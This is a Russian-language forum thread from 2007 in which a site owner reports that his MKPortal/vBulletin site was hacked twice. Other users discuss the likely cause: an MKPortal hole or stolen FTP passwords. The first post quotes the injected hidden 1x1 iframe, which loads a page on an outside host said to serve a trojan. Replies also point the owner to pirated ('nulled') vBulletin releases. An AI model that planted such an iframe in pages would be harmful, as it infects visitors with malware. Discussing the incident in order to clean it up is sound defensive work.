Your fucking browser doesn't support JavaScript, so you can't post here.
Loading
Объявления
11.07.2007, 09:20
#1
Продвинутый
Регистрация: 29.08.2006
Сообщений: 32
Поблагодарил(-а): 18
Поблагодарили 16 раз(а) в 5 сообщениях
Репутация: Опытный (16 )
Взлом 3.6.7Pl1
Можете посмотреть, на данный момент сайт (ok.dvn.in) в дауне, т.к. я на работе и здесь у меня нет доступа к ftp :(
Если посмотреть код страницы, то там виден фрейм
Код:
<iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no>
Уже второй раз ломают, первый раз данный фрейм вставляли, когда стоял 3.6.4 все подчистил проапдейтился до 3.6.7. и вот те на, снова.
Сам сайт работает на MKPortal в связке с воблой 3.6.7 PL1 (периодически ставлю патчи, которые здесь выкладывают)
Х/з, что именно сломали MKP или воблу, на офф.сайте MKP ничего про баги нет, видимо всетаки где то находят косяк в вобле.
На странице, на которую ссылается фрейм троян, кто нить сталкивался с этим?
Рекламка
Реклама на форуме
Файловый Архив
Неограниченное количество категорий и суб-категорий
Тонкие настройки прав доступа
Предпросмотр медиа файлов: FLV, IFLV, F4A, F4V, MP4, MP3, MOV и других...
Мультизагрузка файлов - SWFUploader
Добавление файлов с сервера
Подробности и история обновлений продукта в
этой теме
11.07.2007, 09:49
#2
Private Person
Developer
Регистрация: 01.08.2005
Сообщений: 5,594
Версия vB: 1.x.x
Пол:
Поблагодарил(-а): 729
Поблагодарили 4,430 раз(а) в 1,661 сообщениях
Репутация: Гуру (4435 )
vd9 , критическая уязвимость скорее в MKPortal'е, чем в vB. Имхо, поддержки "фактической" у него нет, полу-мертвый проект. Что касается vB, чей релиз ставил?
11.07.2007, 09:55
#3
Продвинутый
Регистрация: 29.08.2006
Сообщений: 32
Поблагодарил(-а): 18
Поблагодарили 16 раз(а) в 5 сообщениях
Репутация: Опытный (16 )
Форум все время беру здесь на vbsupport.org
Добавлено через 3 минуты
Почему тогда выдается ошибка forum/includes/config.php on line 186
Последний раз редактировалось vd9; 11.07.2007 в 09:59 ..
Причина: Добавлено сообщение
11.07.2007, 09:59
#4
Private Person
Developer
Регистрация: 01.08.2005
Сообщений: 5,594
Версия vB: 1.x.x
Пол:
Поблагодарил(-а): 729
Поблагодарили 4,430 раз(а) в 1,661 сообщениях
Репутация: Гуру (4435 )
Цитата:
Сообщение от
vd9
Форум все время беру здесь на vbsupport.org
Ясно дело..
Под вопросом
Цитата:
Сообщение от
VipeR
чей релиз ставил?
я имел ввиду автора нуля.
11.07.2007, 10:02
#5
Private Person
Developer
Регистрация: 01.08.2005
Сообщений: 5,594
Версия vB: 1.x.x
Пол:
Поблагодарил(-а): 729
Поблагодарили 4,430 раз(а) в 1,661 сообщениях
Репутация: Гуру (4435 )
Цитата:
Сообщение от
vd9
Почему тогда выдается ошибка forum/includes/config.php on line 186
Строка 186? гм.. в конфиге всего 178 строк..
Что у тебя там?
11.07.2007, 10:13
#6
Продвинутый
Регистрация: 29.08.2006
Сообщений: 32
Поблагодарил(-а): 18
Поблагодарили 16 раз(а) в 5 сообщениях
Репутация: Опытный (16 )
Цитата:
Сообщение от
VipeR
я имел ввиду автора нуля.
AnTekapb
Цитата:
Строка 186? гм.. в конфиге всего 178 строк.. Что у тебя там?
х/з че там, пока посмотреть не могу т.к. все хозяйство сайта на домашнем компе.
Прикол в том, что взломано 2 сайта второй boerboel.dvn.in по структуре они идентичны, но там ошибка в 187 строке.
11.07.2007, 10:20
#7
Private Person
Developer
Регистрация: 01.08.2005
Сообщений: 5,594
Версия vB: 1.x.x
Пол:
Поблагодарил(-а): 729
Поблагодарили 4,430 раз(а) в 1,661 сообщениях
Репутация: Гуру (4435 )
Цитата:
Сообщение от
vd9
AnTekapb
http://vbsupport.org/forum/showthrea...t=9674&page=40
Используй нуль от
Ateist'а или от
GYSN .
Цитата:
Сообщение от
vd9
Прикол в том, что взломано 2 сайта второй boerboel.dvn.in по структуре они идентичны, но там ошибка в 187 строке.
На втором сайте тоже MKPortal стоял?
11.07.2007, 10:25
#8
Гуру
Регистрация: 29.08.2005
Адрес: Рiдна Олбанея
Сообщений: 3,773
Версия vB: 3.8.x
Поблагодарил(-а): 39
Поблагодарили 1,119 раз(а) в 787 сообщениях
Репутация: Гуру (1155 )
ты бы лучше пароль на ftp сменил бы, чем на воблу гнать
какиры, которые могут поломать воблу, врядли будут ставить iframe, им бы что поприкольнее.
а у тебя оптовые хакеры, они пароли на ftp тысячами тырят и продают свои услуги всяким накрутчикам
11.07.2007, 10:25
#9
Продвинутый
Регистрация: 29.08.2006
Сообщений: 32
Поблагодарил(-а): 18
Поблагодарили 16 раз(а) в 5 сообщениях
Репутация: Опытный (16 )
угу, все одинаково было
Добавлено через 40 секунд
Цитата:
Сообщение от
netwind
ты бы лучше пароль на ftp сменил бы, чем на воблу гнать
причем здесь пароль ftpшника?
Последний раз редактировалось vd9; 11.07.2007 в 10:26 ..
Причина: Добавлено сообщение
11.07.2007, 10:35
#10
Гуру
Регистрация: 29.08.2005
Адрес: Рiдна Олбанея
Сообщений: 3,773
Версия vB: 3.8.x
Поблагодарил(-а): 39
Поблагодарили 1,119 раз(а) в 787 сообщениях
Репутация: Гуру (1155 )
даже лучше сначала комп на вирусы проверь, удали , а потом поменяй.
сейчас так модно :
http://www.host.ru/news/2007/03/19.html
Опции темы
Опции просмотра
Линейный вид
Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
Текущее время: 07:37 23.05.2012 . Часовой пояс GMT +4.